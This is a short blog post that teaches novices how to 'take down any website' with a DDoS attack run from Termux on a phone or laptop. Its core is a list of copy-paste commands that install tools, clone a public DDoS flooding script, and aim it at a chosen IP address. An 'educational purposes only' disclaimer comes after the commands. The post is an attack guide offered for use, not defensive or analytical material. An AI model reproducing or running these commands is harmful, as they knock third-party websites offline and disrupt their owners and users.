Take down any website using DDOS Termux
Hello guys Its me Aashish sah owner of Ramrati's Blog and in this article i am going to teach you How to take down any website using termux (DDOS attack) So without any further delay let's get into it.
What is DDoS Attack?
DDoS stands for Distributed Denial of Service, and it's a method where cybercriminals flood a network with so much malicious traffic that it cannot operate or communicate as it normally would. This causes the site's normal traffic, also known as legitimate packets, to come to a halt.
Requirements:
No#1: A device whether phone or laptop
No#2: Internet whether Mobile network or wifi(Mobile network will be more effective.)
NO#3: Termux apk obviously (Don't download from playstore download from link below:
Termux download link:
No#4: If all of the mentioned above requirements are ready then folow me step by step:
Step By step how to hack website:
Download Termux from above link and copy paste the commands which I have given Below:
Command List:$ pkg install git -y
$ pkg install python -y
$ pkg install python3 -y
$ git clone https://github.com/palahsu/DDoS-Ripper.git
$ cd DDoS-Ripper
$ ls
$ python3 DRipper.py
$ python3 DRipper.py -s [ip Address] -t 135
Example - python3 DRipper.py -s 0.00.00.00 -t 135
Note: Just copy paste the commands from here otherwise you will get a password page so to skip password step copy and paste all the commands from here only.
Copy all commands one by one from above or at once from below:
All in one command list:
pkg install git -y, pkg install python -y, pkg install python3 -y, git clone https://github.com/palahsu/DDoS-Ripper.git, cd DDoS-Ripper, ls, python3 DRipper.py, python3 DRipper.py -s [replace ip Address here with your] -t 135
Disclaimer
Our blog or all the things related to our blog does not any kind of responsibility and This article is only for educational purpose so if you do any kind of activity its totally your responsibility. Warning - Do not attack government pages (.gov/.gob), educational pages (.edu) or the United States Department of Defense (.mil),the creator is not responsible for the damage caused by the attacks.remember: you are responsible for the attacks since this tool was created for educational purposes